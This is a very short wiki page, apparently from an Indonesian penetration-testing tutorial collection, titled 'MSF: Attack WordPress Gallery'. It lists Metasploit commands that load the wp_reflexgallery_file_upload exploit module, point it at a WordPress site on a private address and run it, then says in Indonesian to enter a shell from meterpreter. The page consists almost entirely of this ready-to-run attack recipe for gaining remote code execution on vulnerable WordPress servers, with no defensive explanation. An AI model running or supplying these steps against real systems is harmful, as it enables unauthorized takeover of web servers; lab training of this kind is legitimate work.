MSF: Attack WordPress Gallery

From OnnoWiki
Jump to navigation Jump to search

Attack ReflexGallery

use exploit/unix/webapp/wp_reflexgallery_file_upload
set RHOST 192.168.12.120
set RPORT 80
set TARGETURI /wordpress/
run


Masuk ke shell dari meterpreter